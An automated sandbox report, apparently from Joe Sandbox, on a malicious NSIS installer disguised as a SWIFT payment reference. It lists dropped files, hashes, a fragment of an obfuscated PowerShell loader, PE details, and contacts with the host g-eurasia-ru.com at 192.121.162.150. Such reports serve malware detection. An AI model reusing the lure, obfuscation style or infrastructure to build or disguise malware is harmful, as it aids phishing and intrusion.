                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Category:dropped
                          Size (bytes):403933
                          Entropy (8bit):7.911407065791383
                          Encrypted:false
                          SSDEEP:6144:ONeZyO6KKoPz70NjFXAokZnpWRClI/4HGJ/xCQN7lfIVDw9SbcpIJGgD:ONl5KKwMUZpWiIgHGJjTfaDsSgpIJp
                          MD5:724AC474C4FCAA1DF6DA3F9245AC9C85
                          SHA1:C68CC50C2BD9E44C87FBCA76C4EBD0C7B9942B3D
                          SHA-256:D223088DD0D29E76253A5CFCBF1CFAF05312285F2F2F60AEAFC6E8A96EFCBCDE
                          SHA-512:339B700A684E5520BF05E35DE0594A015C57C513B68B690C37E5F8A0336EF5253B4C756C0052931317CC8581C5AC9562093A4BE97525B9FFF676440AF2E3BE21
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 58%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@..........................P............@..............................................]...........................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...............................rsrc....].......^..................@..@................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):365557
                          Entropy (8bit):7.637858645077539
                          Encrypted:false
                          SSDEEP:6144:KFl5fm/WLsKd/8vsujrdqNd7FM26W5LrTiDbtGpoi/TQr7cMyt:KLUeLwvzdEFNRiHkpZyPyt
                          MD5:5C953FBFC930A495E5DC86BE951FA70D
                          SHA1:95A09B1B0D2F5F51CFFCD6BC2A3FFB535472DD5E
                          SHA-256:AD86C68EC47D82F814DDA4C36900755A9A880CEFFAA7C7D4420C941EF74961A2
                          SHA-512:39EACD484FCCB6C97B283298FA4FB0D3BC4BC25FDD1AA2E699F321149FD0F7B3EE503EBAA667EC37640AF7740F55BDD1669E1F6A7FE8B4F88070E2B8952CB587
                          Malicious:false
                          Preview:...........^^.VVV.........$......qq.z.........1.K...............,,,.J........,,..=....ee.....;...................................................E............................UUUU..................ww.......}}}.7...........................................................................<<<...................g....=......A......x.....66.....Y........XX......g......YYYY.................9....^......5....l...........||||..((.......%......++.M.......VV..........&..................r.......................ccc........2....l........."....__.....__..44.......................$$............................................w.....##............................1111...Y.....6../......7.}}}.v.........F........``.......q.##.....?..zzzz..............y................PPPPPPP.&&....B.............a.kk.......&&..).,............77.....................JJ.ee....................................vvv......>>....................8888.d....................~........8......0000.4444.J.....M......b........................TT.
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:ASCII text, with very long lines (58469), with no line terminators
                          Category:dropped
                          Size (bytes):58469
                          Entropy (8bit):5.369745148282174
                          Encrypted:false
                          SSDEEP:1536:yUSQdTKTU/DH1zaPRhjszN3pikKyRdK8jXLx:yUSyKUDH1zwZ43piERo8h
                          MD5:84E620FE4B523DDC7891437371279919
                          SHA1:991E05D10D65983682D44654598EF7FE4DDD0D3D
                          SHA-256:2E8CCCA56461E9E413E18609E6A5BE32095D59F9D0ED65A9DB6479CE4312708D
                          SHA-512:60AC1FDBAE8352420F1A806A34021ECCF3D56B6520982A60D2B57438ACA82AE1A5860799F577100E9EC1141C927F03E1384D1FA404CFBDB7AF53102BE66D33E5
                          Malicious:true
                          Preview:$Dottel=$Undervisningsdifferentieringernes;<#Pseudovidenskabelige Paraenetic Beget Hvdvundne #><#Overfladeberegningen Ricininic Unsatanically omstyrtning Bookingsystem Reaccumulation Organicismal #><#Afstedkomme Visioners Harrumphes Chunder #><#genetic Teltningens Venskabskamp Skippering Recaption Ducally #><#Lovhjemlens Indsens Tympanal #><#Tvehundene Vildgaas Craves Caruncle Draftier Millionrers #><#officinet rejsegodsforsikring Advocatrice Smagsstofferne Avitic #><#Apozymase Hidrre Eftergiven Burnishment Wontons Lnderne Massiveres #><#Scarifier Cebell Trohn tallyho Epifaunas #><#superinnocently Thirtyish Abiturers Kosteskaft Skarlagensfeber raabalancerne #><#Studene Vejrmeldings fragil Ansttelsens #><#Dyvelsdrkkets Lefleris Dvrgpapegje Forlovelsesgaves Skrotter Fuldbyrdelsesfristens #><#Efficacity Landbrugsjords Indeholdtes #><#Tragasol Engraving Cirkulrebreves Reifikationerne Apophysate #><#Fuldautomatisere Uhindret Ypperligt Gruppedynamisk #><#Eteocretes Regnbuehinden Ratihabere R
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1816
                          Entropy (8bit):4.90001051519151
                          Encrypted:false
                          SSDEEP:48:CsKfwRMEaweDkN4ESwkpkMNcvybvDX/6suFE:CrfwWREHSwEAyHisuFE
                          MD5:47A8E2645F9FCD360C294B7B4C0DCE60
                          SHA1:996713E2466113F2707289D8B9752BB4BCA9E490
                          SHA-256:07F4132A0A34AF2D1AF3254E13C06C09529AFBDAB758EDAD4003E91F91B750D6
                          SHA-512:8FB0068828DCF6E2722187C4E767B5BC8CD7E550E4D53281E21A928A0AE5DD2C3635302F43BEDFFBC2640831445D234C5E00F71ADA30B4EC6CD112645395D23D
                          Malicious:false
                          Preview:.........r<.B....MJ........._........i..%.m....HO....._..........:........r#...........cw....Q...j.....G........6................O....N.;.....'..8....0....\h..9..=.6..\......XB......z....u..5............2...............B(R.-....6.>K.y.....}...).......%..h...............\.B.....B......k....g......'Cs..c....q../.-BA.E.^......+....g..@..4\..m....N....M.......................................#.@...{)...2..a...m.....n............{.......>.....?...|X0...=.....0........c.f........;......T...T.V.c.....M....p..$....g.(P...o........s..w............#...}.J....".-7.6.U....Y.....R.......'X.........9............n...Z.g...#...>.K....+.......Z....G.........{...[.....dD.......o...!...Z.`......<.s....".......RH$...x3.........Y.........,.... ..1.y......4.8.E.............'......./[..........y.....<u..V....._.....#.............'..\...................L....}.....R.......o......{1.[S..'.].~.......B.\..!e.7...l..............<......2.0.,.........R..s...`g..&.v.............z.l.......|.U...I.a..:.......
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                          Category:dropped
                          Size (bytes):826
                          Entropy (8bit):3.481175179082517
                          Encrypted:false
                          SSDEEP:12:8gl0ha/ledp8wXuQUlbqpsOtUxmbdpYmHbqetUflzJCN85v4t2YZ/elFlSJm:8tdO/9fcd9K24qy
                          MD5:8333EA3F07B44564B34BDC3B84F4D820
                          SHA1:BAF95230300663418624E494CA81FCC8D329624C
                          SHA-256:E4EFE4FDBF86068C374181C790E6314B9249D76F5C98F96A0D3C128BE3806DC6
                          SHA-512:8BD77DF59DAAD63876B1CAC69C2773F947B729EC449471B2B2AB9A8ABD1E3965C0BD06898F87DC412FAE8F301EB1619516E3590088124A82F91ED7E6E70A1824
                          Malicious:false
                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.......2...........Tankvognskrselsulykke.geo.d............................................T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o...(...C.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.T.a.n.k.v.o.g.n.s.k.r.s.e.l.s.u.l.y.k.k.e...g.e.o.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                          Process:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                          Category:dropped
                          Size (bytes):922
                          Entropy (8bit):2.9756559525609214
                          Encrypted:false
                          SSDEEP:12:8gl0gsXowAOcQ/tz+7RafgKDFlKiRKQ1mg/3NJkKAd4t2YZ/elFlSJm:8/LDaRMgK5Qi9449HAvqy
                          MD5:EAF42A1813B1CCADB7388D860F2BC035
                          SHA1:5143522890C76E6FB2C64A53F70237534B9078B1
                          SHA-256:A17226D884E87B83E347A87DD0376D5CAB8D0C4206B19B8BB557ADF3CCF9C851
                          SHA-512:6D99057433A96648423859ABB32D3668790A539DD51B4975074B7EF80B746924E752DC1C47B87526FD4FB3EC29A222D8E856789B9A27B0B16DC94F7E89B5EDD3
                          Malicious:false
                          Preview:L..................F........................................................#....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....`.2...........truede.une..F............................................t.r.u.e.d.e...u.n.e......./.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.t.r.u.e.d.e...u.n.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.911407065791383
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          File size:403'933 bytes
                          MD5:724ac474c4fcaa1df6da3f9245ac9c85
                          SHA1:c68cc50c2bd9e44c87fbca76c4ebd0c7b9942b3d
                          SHA256:d223088dd0d29e76253a5cfcbf1cfaf05312285f2f2f60aeafc6e8a96efcbcde
                          SHA512:339b700a684e5520bf05e35de0594a015c57c513b68b690c37e5f8a0336ef5253b4c756c0052931317cc8581c5ac9562093a4be97525b9fff676440af2e3be21
                          SSDEEP:6144:ONeZyO6KKoPz70NjFXAokZnpWRClI/4HGJ/xCQN7lfIVDw9SbcpIJGgD:ONl5KKwMUZpWiIgHGJjTfaDsSgpIJp
                          TLSH:E08412AED174C7EAC6A73E364F342A2511F96E3D31609BC7B72082953DED265861E3C0
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                          Icon Hash:4080000000018245
                          Entrypoint:0x4034f7
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A2E0h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080CCh]
                          mov esi, dword ptr [004080D0h]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FAA90B77F9Ah
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FAA90B77F6Ah
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [0042A2D8h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaf0000x5df8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x65150x660026e66bea3b62728a217ae7bf343ebc1aFalse0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x203380x6004b75405561a3fcc45b8fe27a6808f3b5False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .ndata0x2b0000x840000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0xaf0000x5df80x5e006191a6c14b9a369918dcadc2e21b63daFalse0.23503989361702127data4.963722789547615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xaf2c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.046680497925311204
                          RT_ICON0xb18700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.07856472795497185
                          RT_ICON0xb29180xdafPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8895232657721953
                          RT_ICON0xb36c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.09508196721311475
                          RT_ICON0xb40500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.16578014184397163
                          RT_DIALOG0xb44b80x100dataEnglishUnited States0.5234375
                          RT_DIALOG0xb45b80x11cdataEnglishUnited States0.6056338028169014
                          RT_DIALOG0xb46d80xc4dataEnglishUnited States0.5918367346938775
                          RT_DIALOG0xb47a00x60dataEnglishUnited States0.7291666666666666
                          RT_GROUP_ICON0xb48000x4cdataEnglishUnited States0.7763157894736842
                          RT_VERSION0xb48500x264dataEnglishUnited States0.4820261437908497
                          RT_MANIFEST0xb4ab80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 18, 2024 14:37:12.858056068 CET4973480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:13.870683908 CET4973480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:15.980103970 CET4973480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:17.880008936 CET4973580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:18.886368990 CET4973580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:20.902003050 CET4973580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:22.929032087 CET4973680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:23.933207989 CET4973680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:25.948805094 CET4973680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:27.937608957 CET4973780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:28.948818922 CET4973780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:30.948879004 CET4973780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:33.517576933 CET4973880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:34.527015924 CET4973880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:36.527043104 CET4973880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:38.545180082 CET4974080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:39.558254004 CET4974080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:41.558243990 CET4974080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:43.578187943 CET4974180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:44.589478970 CET4974180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:46.605068922 CET4974180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:48.623223066 CET4974280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:49.636384964 CET4974280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:51.636313915 CET4974280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:53.654356003 CET4974380192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:54.667618990 CET4974380192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:56.683202982 CET4974380192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:58.687094927 CET4974480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:37:59.698995113 CET4974480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:01.714447975 CET4974480192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:03.772543907 CET4974580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:04.777014017 CET4974580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:06.776937962 CET4974580192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:08.780987978 CET4974680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:09.776978970 CET4974680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:11.778013945 CET4974680192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:13.813014984 CET4974780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:14.823847055 CET4974780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:16.839447975 CET4974780192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:18.827214003 CET4974880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:19.839507103 CET4974880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:21.839479923 CET4974880192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:23.841814041 CET4974980192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:24.855098963 CET4974980192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:26.855122089 CET4974980192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:28.875063896 CET4975080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:29.886324883 CET4975080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:31.902004004 CET4975080192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:33.904390097 CET4975180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:34.917704105 CET4975180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:36.917612076 CET4975180192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:38.938474894 CET4975280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:39.948991060 CET4975280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:41.964454889 CET4975280192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:43.959647894 CET4975380192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:44.964459896 CET4975380192.168.2.4192.121.162.150
                          Mar 18, 2024 14:38:46.964452982 CET4975380192.168.2.4192.121.162.150
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 18, 2024 14:37:12.398525000 CET5267353192.168.2.41.1.1.1
                          Mar 18, 2024 14:37:12.559487104 CET53526731.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 18, 2024 14:37:12.398525000 CET192.168.2.41.1.1.10xbe19Standard query (0)g-eurasia-ru.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 18, 2024 14:37:12.559487104 CET1.1.1.1192.168.2.40xbe19No error (0)g-eurasia-ru.com192.121.162.150A (IP address)IN (0x0001)false

                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:14:36:39
                          Start date:18/03/2024
                          Path:C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
                          Wow64 process (32bit):true
